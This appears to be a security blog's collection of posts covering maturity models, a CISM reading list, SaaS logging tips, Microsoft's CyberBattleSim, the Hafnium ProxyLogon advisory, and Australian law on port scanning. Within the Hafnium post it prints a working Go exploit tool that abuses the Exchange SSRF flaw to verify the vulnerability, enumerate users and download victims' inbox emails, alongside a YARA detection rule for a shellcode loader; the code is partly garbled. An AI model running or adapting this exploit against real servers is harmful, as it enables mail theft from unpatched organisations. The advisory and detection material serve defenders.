Cyber Security Mature Models

Cyber Security Mature Models

There are so many maturity models that help us evaluate, assess, and benchmark the effectiveness of our security programs.

Maturity Models, by nature, are structured at various levels for continuous improvement. Hence, these further help in “suggesting/recommending” directions to what capabilities or improvements are needed to improve the performance of these security programs.

Sharing some of the maturity models for reference:

1. AWS Security Maturity Model from Amazon Web Services (AWS)
You can also refer AWS Security Maturity Roadmap by Scott Piper

2. OWASP DevSecOps Maturity Model by OWASP® Foundation

3. DevSecOps Maturity Assessment by GitLab

4. Cloud Security Maturity Model by IANS

5. Red Team Maturity Model

6. Threat Detection Maturity Model by Snowflake

7. Threat Hunting Maturity Model by Sqrrl

PS: While these maturity models are insightful, they might be misleading if circumstances, context, and risk appetite are not well considered.

Passing; CISM Study Guide

Passing; CISM Study Guide

job descriptions

Information security governance

·          Information Security Governance: Guidance for Information Security Managers

·          Accountability for Information Security Roles and Responsibilities

·          Info Security Chiefs: Communications Is Key to Mitigate Risk)

·          Code of Professional Ethics

·          The Business Model for Information Security

·          Return on Security Investment

·          Differentiating Key Terms in the Information Security Hierarchy

·          How to Measure Security From a Governance Perspective

Information security operations

·          Information Security Architecture: Gap Assessment and Prioritization)

·          Nonsense Compliance

·          Enterprise Security Architecture—A Top-down Approach

·          The Benefits of Information Security and Privacy Awareness Training Programs

·          Checking the Maturity of Security Policies for Information and Communication

·          Framework for Protecting Your Valuable IT Assets

Risk Management

·          Developing an Information Security and Risk Management Strategy

·          Risk Management Process

·          Vulnerability Assessment

·          Enterprise Risk Monitoring Methodology

·          A Risk-Based Management Approach to Third-Party Data Security, Risk and Compliance

Information Security Incident Management

·          An Introduction to Information Security Incident Management)

·          Internal Control – Key to Delivering Stakeholder Value)

·          A Business-integrated Approach to Incident Response

·          Incident Management and Response

·          Evaluating Security Incident Management Programs)

Audit and monitoring

·          Strengthening Internal Audits Influence and Impact

·          Security Monitoring as Part of the InfoSec Playbook

·          Information Security Management Audit Program)

·          Integrating KRIs and KPIs for Effective Technology Risk Management

Other ISACA Resources:

·          CISM Certification Guide

·          CISM Certification | Certified Information Security Manager | ISACA

·          CISM Planning Guide (

Detecting the “Next” SolarWinds-Style Cyber Attack

Detecting the “Next” SolarWinds-Style Cyber Attack

Hardening SaaS

Hardening SaaS

For every complex problem there is an answer that is clear, simple, and wrong. H. L. Mencken

Log the following for SaaS and API

  • Admin role assigned or revoked.
  • API token created or revoked.
  • Application modified.
  • Look for impossible travel (UEBA) and based on ASN Address, expiry sessions to admin panels or admin api/users immediately.

Great talk by [email protected]

Microsoft Cyberattack Simulator

Microsoft Cyberattack Simulator

Microsoft has released an open-source cyberattack simulator that allows security researchers and data scientists to create simulated network environments and see how they fare against AI-controlled cyber agents.

This simulator is being released as an open-source project named ‘CyberBattleSim‘ built using a Python-based Open AI Gym interface. 

The Microsoft 365 Defender Research team created CyberBattleSim to model how a threat actor spreads laterally through a network after its initial compromise.

“The environment consists of a network of computer nodes. It is parameterized by a fixed network topology and a set of predefined vulnerabilities that an agent can exploit to laterally move through the network.”

“The simulated attacker’s goal is to take ownership of some portion of the network by exploiting these planted vulnerabilities. While the simulated attacker moves through the network, a defender agent watches the network activity to detect the presence of the attacker and contain the attack,” the Microsoft 365 Defender Research Team explains in a new blog post.

To build their simulated environment, researchers will create various nodes on the network and indicate that services are running on each node, their vulnerabilities, and how the device is protected.

Automated cyber agents (threat actors) are then deployed in the environment, where they randomly select actions to perform against the various nodes to take control over them.


Detecting Zero-days in ArcSight

Detecting Zero-days in ArcSight

Allot of customers ask; “Can you detect Zero-days”, most Cyber vendors, will give you a marketing answer, and really, that is a simple question to a exhaustive topic. But, the reality is, that detecting zero-days is near impossible. However, this video is the first, I’ve seen that get close to detecting zero-days. Using a very funky tool to detect a BROP attack, or any other kind of buffer-overflow attack. ZeroDetect –


“Hafnium,” Researcher Publishes Code to Exploit Microsoft Exchange Vulnerabilities on Github

“Hafnium,” Researcher Publishes Code to Exploit Microsoft Exchange Vulnerabilities on Github

Microsoft owns GitHub, the Hafnium Exploit code has been now shutdown on GitHub, but it’s important to understand, the code is now still available on the internet.

While Github has shut it down and will stop rapid improvement of this this PoC exploit via GitHub.

It is still available for anyone with basic internet search skills and obviously for any motivated threat actor, they would be actively exploiting this as soon as the CVE was released.

I was able to find the Exploit code easily.

quick one liner to check for RCE (u might need to change the IIS path on some systems) is: findstr /snip /c:”ResetOABVirtualDirectory” C:\inetpub\logs\LogFiles\*.log



On March 02, 2021 Microsoft published a detailed report outlining four previously unknown “Zero Day” vulnerabilities in Microsoft Exchange Server. The attack, launched by Hafnium, targeted these vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) which allowed state sponsored threat actors to exploit Internet facing Exchange servers, gaining access to access to internal systems (Microsoft , 2021). This threat is high and is estimated to affect over 30,000 businesses worldwide. The attack chain is illustrated below:

Hafnium’s exploitation of Microsoft Exchange Vulnerabilities1.png

On March 10, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI), issued a joint advisory addressing the disclosed vulnerabilities in Microsoft Exchange Server (Cybersecurity & Infastructure Security Agency, 2021). CISA and FBI assessed that the threat actors could exploit these vulnerabilities collectively tracked as ProxyLogon, to compromise networks, steal information, encrypt data for ransom, execute destructive attacks, and/or sell access to compromised networks on the Dark Web.The patches for these vulnerabilities were released on March 8th, 2021. All security leaders should immediately address this incident by working with their IT teams to make sure this risk is contained, and the appropriate actions taken. Below are the recommended steps:

  1. Ensure the patches have been applied ASAP to the Exchange Server environment.
    1. If you are unable to apply updates for whatever reason please follow the Microsoft alternative mitigations (Microsoft Security Response Center, 2021) steps in the interim.
  2. Make sure your SEIM threat intelligence engine has been updated with current IOCs and the UEBA algorithms have been updated.
  3. Check for compromised On-Premises Exchange Servers. Microsoft published ‘Check My OWA’ tool to check Exchange Servers with Outlook Web Access (OWA) enabled.
  4. Analyze your Exchange Server logs to identify any potential compromise. Microsoft published an updated PowerShell script named “Test-ProxyLogon.ps1” (available on Microsoft’s official GitHub page) that scans Microsoft Exchange log files for indicators of compromise (IOCs) associated with the exploited vulnerabilities.
  5. Organizations should load Microsoft Support Emergency Response Tool (MSERT) against their Exchange Servers to detect and remove potential web shells.   Microsoft has released a new (March 08, 2021) update to the Microsoft Safety Scanner (MSERT)
  6. If you confirm you have been compromised, please follow the Cybersecurity & Infrastructure Security Agency (Cybersecurity & Infrastructure Security Agency, 2021) Alert (AA21-062A) Below is the MITRE ATT&CK techniques observed for the Microsoft Exchange Server attack.  Hafnium’s exploitation of Microsoft Exchange Vulnerabilities2.png
  7. ArcSight Threat Intelligence engine was updated on March 03, 2021. If you need assistance or want to take advantage of free tools Micro Focus has available please see our MITRE ATT&CK® navigator for Micro Focus Products and click “Exploit Public.” 



rule malware_goshell_0 {
        author      = "c3rb3ru5d3d53c"
        description = "GoShell Shellcode Injector"
        reference   = ""
        hash        = "a70b749e1d8a236e343ddbdf9d19e7b8"
        type        = "malware.loader/malware.downloader"
        created     = "2021-02-27"
        os          = "windows"
        tlp         = "white"
        rev         = 1
        $golang_0 = "vendor/golang" ascii nocase
        $uniq_0   = ".GetShellcode" ascii wide nocase
        $hex_0    = "\\x"           ascii wide nocase
        $hex_1    = "hex.Decode"    ascii wide nocase
        $net_0    = /https?:\/\//   ascii wide nocase
        $net_1    = "GET"           ascii wide
        $net_2    = "net/http"      ascii wide nocase
        $cert_0   = {30 82 ?? ?? 30 82 ?? ??}
        uint16(0) == 0x5a4d and
        uint32(uint32(0x3c)) == 0x00004550 and
        filesize > 5MB and not
        $cert_0 and
        #golang_0 > 64 and
        $uniq_0 and
        1 of ($hex_*) and
        1 of ($net_*)


package main

import (

//Detecting vulnerability existence script 
func Verify(targetUrl string) bool {
    tr := &http.Transport{
        TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
    client := &http.Client{Transport: tr}

    req, _ := http.NewRequest("GET", targetUrl, nil)
    req.Header.Add("Cookie","X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;")
    resp, _ := client.Do(req)
    defer resp.Body.Close()
    body, _ := ioutil.ReadAll(resp.Body)

    if strings.Contains(string(body), "NegotiateSecurityContext") {
        return true
    } else {
        return false

func append16(v []byte, val uint16) []byte {
    return append(v, byte(val), byte(val>>8))

func append32(v []byte, val uint16) []byte {
    return append(v, byte(val), byte(val>>8), byte(val>>16), byte(val>>24))

const (
    negotiateUnicode    = 0x0001 // Text strings are in unicode
    negotiateOEM        = 0x0002 // Text strings are in OEM
    requestTarget       = 0x0004 // Server return its auth realm
    negotiateSign       = 0x0010 // Request signature capability
    negotiateSeal       = 0x0020 // Request confidentiality
    negotiateLMKey      = 0x0080 // Generate session key
    negotiateNTLM       = 0x0200 // NTLM authentication
    negotiateLocalCall  = 0x4000 // client/server on same machine
    negotiateAlwaysSign = 0x8000 // Sign for all security levels

//Generate NTLM Type1 
func Negotiate() []byte {
    var ret []byte
    flags := negotiateAlwaysSign | negotiateNTLM | requestTarget | negotiateOEM

    ret = append(ret, "NTLMSSP\x00"...) // protocol
    ret = append32(ret, 1)              // type
    ret = append32(ret, uint16(flags))  // flags
    ret = append16(ret, 0)              // NT domain name length
    ret = append16(ret, 0)              // NT domain name max length
    ret = append32(ret, 0)              // NT domain name offset
    ret = append16(ret, 0)              // local workstation name length
    ret = append16(ret, 0)              // local workstation name max length
    ret = append32(ret, 0)              // local workstation name offset
    ret = append16(ret, 0)              // unknown name length
    ret = append16(ret, 0)              // ...
    ret = append16(ret, 0x30)           // unknown offset
    ret = append16(ret, 0)              // unknown name length
    ret = append16(ret, 0)              // ...
    ret = append16(ret, 0x30)           // unknown offset

    return ret

//Get effective information FQDN with NTLM TYPE2
func Ntlminfo(targetUrl string) (fqdn string, domain string) {

    //var fqdn string

    tr := &http.Transport{
        TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
    client := &http.Client{Transport: tr}

    req, _ := http.NewRequest("GET", targetUrl, nil)
    req.Header.Add("Authorization", fmt.Sprintf("NTLM %s", base64.StdEncoding.EncodeToString(Negotiate())))
    resp, _ := client.Do(req)
    reg1 := regexp.MustCompile(`[^NTLM].+;Negotiate\z`)
    reg2 := regexp.MustCompile(`[^\s].+[^;Negotiate]`)
    reg3 := regexp.MustCompile(`(\x03\x00.)(.+?)(\x05\x00)`)
    reg4 := regexp.MustCompile(`\x03\x00.|\x05|\x00`)
    reg5 := regexp.MustCompile(`(\x04\x00.)(.+?)(\x03\x00)`)
    reg6 := regexp.MustCompile(`\x04\x00.|\x03|\x00`)

    for _, values := range resp.Header {
        type2 := reg2.FindString(reg1.FindString(strings.Join(values, ";")))
        if type2 != "" {
            decodeBytes, _ := base64.StdEncoding.DecodeString(reg2.FindString(type2))
            fqdn = reg4.ReplaceAllString(reg3.FindString(string(decodeBytes)), "")
            domain = reg6.ReplaceAllString(reg5.FindString(string(decodeBytes)), "")

func Postxml(targetUrl string, fqdn string, xmlcontent string) string {
    //urlProxy, _ := url.Parse("")
    tr := &http.Transport{
        TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
        //Proxy: http.ProxyURL(urlProxy),
    client := &http.Client{Transport: tr}

    req, _ := http.NewRequest("POST", targetUrl, strings.NewReader(xmlcontent))
    req.Header.Add("Cookie", fmt.Sprintf("X-BEResource=%s/EWS/Exchange.asmx?a=~1942062522;", fqdn))
    req.Header.Add("Content-Type", "text/xml")
    resp2, _ := client.Do(req)
    //defer resp2.Body.Close()
    body2, _ := ioutil.ReadAll(resp2.Body)

    return string(body2)

func Userenumerate(targetUrl string, fqdn string, xmlcontent string, userfile string, domainneame string, stime int) {
    ufile, err := os.Open(userfile)
    if err != nil {
        fmt.Println("File error")
    defer ufile.Close()

    fmt.Println("Correct email address: \n")

    br := bufio.NewReader(ufile)
    for {
        name, _, c := br.ReadLine()
        if c == io.EOF {
            fmt.Println("\nComplete ")
        if strings.Contains(string(name), "@") {
            str := Postxml(targetUrl, fqdn, fmt.Sprintf(xmlcontent, string(name)))
            if strings.Contains(str, string(name)) {
                //fmt.Println(fmt.Sprintf("Email address %s is incorrect ", string(name)))
            }else {
            address := fmt.Sprintf("%[email protected]%s", string(name), domainneame)
            str := Postxml(targetUrl, fqdn, fmt.Sprintf(xmlcontent, address))
            if strings.Contains(str, string(name)) {
                //fmt.Println(fmt.Sprintf("Email address %s is incorrect ", address))
            }else {

func makefile(fileName string, conntent string) {

    f, err := os.Create(fileName)
    defer f.Close()
    if err != nil {
    } else {
        _, _ = f.Write([]byte(conntent))

func main(){

    var maddress string

    host := flag.String("h", "", "String required, target address or domain name")
    filepath := flag.String("U", "", "String options, users who need enumerations")
    stime := flag.String("t", "1", "String option, request delay time Default 1")
    desfqnd := flag.String("n", "", "String option, you need to specify FQND")
    list := flag.Bool("l", false, "Optional, Listing Mail")
    emailadd := flag.String("u", "administrator", "string option, designated target, Default administrator")
    downl := flag.Bool("d", false, "Optional, download mail")

    targetUrl := fmt.Sprintf("https://%s/owa/auth/x.js", *host)
    ewsUrl := fmt.Sprintf("https://%s/ews/exchange.asmx", *host)
    postUrl := fmt.Sprintf("https://%s/ecp/temp.js", *host)
    sleep_time, _ := strconv.Atoi(*stime)

    if *host == "" {
        fmt.Println("Please enter the target IP address ")
    fmt.Println("Test the existence of the vulnerability ...")
    if Verify(targetUrl) == true {
        fmt.Println("Vulnerability exists ... Continue ")
        fmt.Println("Vulnerability does not exist ... END")

    mailnum := `<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="" 
                <t:DistinguishedFolderId Id="inbox">

    maillist := `<?xml version='1.0' encoding='utf-8'?>
    <m:FindItem Traversal='Shallow'>
      <m:IndexedPageItemView MaxEntriesReturned="5" Offset="0" BasePoint="Beginning" />
        <t:DistinguishedFolderId Id='inbox'>

download := `<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="" 
        <t:ItemId Id="%s" ChangeKey="%s" />

    fqndstr, domainstr := Ntlminfo(ewsUrl)

    fmt.Println("Target FQND: ", fqndstr)

    if *filepath != "" {
        Userenumerate(postUrl, fqndstr, mailnum, *filepath, domainstr, sleep_time)

    if *desfqnd != "" {
        fqndstr = *desfqnd

    if strings.Contains(*emailadd, "@") {
        maddress = *emailadd
        maddress = fmt.Sprintf("%[email protected]%s", *emailadd, domainstr)

    str := Postxml(postUrl, fqndstr, fmt.Sprintf(mailnum, maddress))

    if strings.Contains(str, maddress) {
        fmt.Println(fmt.Sprintf("The email address %s is incorrect, please re-enter ", maddress))
    }else if strings.Contains(str, "Success") {
        reg01 := regexp.MustCompile(`(<t:TotalCount>)(.+)(</t:TotalCount>)`)
        reg02 := regexp.MustCompile(`<t:TotalCount>|</t:TotalCount>`)
        mnum := reg02.ReplaceAllString(reg01.FindString(str), "")
        fmt.Println("User", maddress, "The number of mail in the inbox in the mailbox is: ", mnum)
        if *list == true {
            if mnum != "0"{
                contents := Postxml(postUrl, fqndstr, fmt.Sprintf(maillist, maddress))

                reg_id := regexp.MustCompile(`(?:t\:ItemId\sId=")(.+?)(?:")`)
                reg_key := regexp.MustCompile(`(?:t\:ItemId\sId=".+?"\sChangeKey=")(.+?)(?:")`)
                reg_sub := regexp.MustCompile(`(?:<t:Subject>)(.+?)(?:</t:Subject>)`)
                id := reg_id.FindAllStringSubmatch(contents, -1)
                key := reg_key.FindAllStringSubmatch(contents, -1)
                subject := reg_sub.FindAllStringSubmatch(contents, -1)

                for i := 0; i < 5 ; i++{
                    fmt.Println("ID :", i+1, "\nItemId: ", id[i][1], "\nkey: ", key[i][1], "\n邮件标题:", subject[i][1])

                if *downl == true {
                    for i := 0; i < 5 ; i++{
                        fmt.Println("Downloading ", i," Email")
                        contentd := Postxml(postUrl, fqndstr, fmt.Sprintf(download, id[i][1], key[i][1]))
                        makefile(fmt.Sprintf("./ID-%v.xml", i+1), contentd)
                    fmt.Println("Download completed")

                fmt.Println("Target mailbox no email! ")
        fmt.Println("Default FQDN invalid, please specify other servers ")

Cyber Treat Intelligence Research – Can you nmap a Country for research?

Cyber Treat Intelligence Research – Can you nmap a Country for research?

It should be common knowledge, that you are not allowed to run reconnaissance (e.g. nmap) against any companies public internet IP addresses, especially a government agency, without an engagement and prior written permission.

Running a port scan is like rattling the windows to see which ones are unlocked.

In a similar vein, if Google maps drive past a Defence site and takes photos, is that liable, isn’t that the same reconnaissance?

As an example, It’s also possible to conduct Microsoft exchange reconnaissance without sending any attack traffic? (version fingerprinting). 

There are existing services such as SHODAN, that can be used for research and exploiting.

Can you be proescudted

Are you doing the right thing ethnically

Is it ok?


I see allot of Cyber researchers, posting articles about, vulnerabilities that exists based on a Country. Obviously, these research ran, some sort of scan, so is this legal or illegal, are you allowed to do this? Can you nmap a whole Australian Country IP address range? This is the question, I am explore in this article?

Part 10.7—Computer offences of criminal code act 1995 for federal stuff

this bit rules:

(7)  A person may be found guilty of an offence against this section even if committing the serious offence is impossible.

1:57immediately followed by this bit

(8)  It is not an offence to attempt to commit an offence against this section.
478.1  Unauthorised access to, or modification of, restricted data
             (1)  A person commits an offence if:
                     (a)  the person causes any unauthorised access to, or modification of, restricted data; and
                     (b)  the person intends to cause the access or modification; and
                     (c)  the person knows that the access or modification is unauthorised.
Penalty:  2 years imprisonment.
             (3)  In this section:
restricted data means data:
                     (a)  held in a computer; and
                     (b)  to which access is restricted by an access control system associated with a function of the computer.
where the definition of restricted explicitly says an ACS must be in use to protect the data. So technically, if there is anti-port scanning tech on the machine, you are accessing restricted data by obtaining a list of ports.

478.3  Possession or control of data with intent to commit a computer offence
             (1)  A person commits an offence if:
                     (a)  the person has possession or control of data; and
                     (b)  the person has that possession or control with the intention that the data be used, by the person or another person, in:
                              (i)  committing an offence against Division 477; or
                             (ii)  facilitating the commission of such an offence.
Penalty:  3 years imprisonment.
             (2)  A person may be found guilty of an offence against this section even if committing the offence against Division 477 is impossible.
No offence of attempt
             (3)  It is not an offence to attempt to commit an offence against this section.
so if you're port scanning/banner grabbing exchange, and someone uses that data for crimes, you're gonna have a bad time
it's vague enough that you could probably get got for it, but port scans/public trawling sounds like it's ok at a federal level at least
looks like i missed most of the juicy parts of this convo, but i have some relevant 2c.i can assure you that people in government feels very strongly that port scanning could be construed as crime. in 2017 (after getting appropriate permission) i scanned the whole * space which formed this article: after-which we did it again against * with appropriate permission, but shit hit the fan real quick. people in govt accused us of crimes - arguing we didn’t have appropriate permission - didn’t have buy in from all the departments - etc. we had to scrap the whole research. it was pretty hairy at one point there.
FWIW we didn’t do any portscanning either, just relied on third-parties like shodan etc for those results

it was a very hands off exercise
people in government feel very strongly that port scanning could be a crime"people in government feel anything that isn't inside their policies & procedures that they don't understand is a crime, tbfh. but uh them feeling it is a crime doesn't make it a crime

Australian Laws pertaining to Cyber Crime


  • onar,censys,binaryedge)
  • Telecommunications (Interception and Access ) Act 1979
  • shodan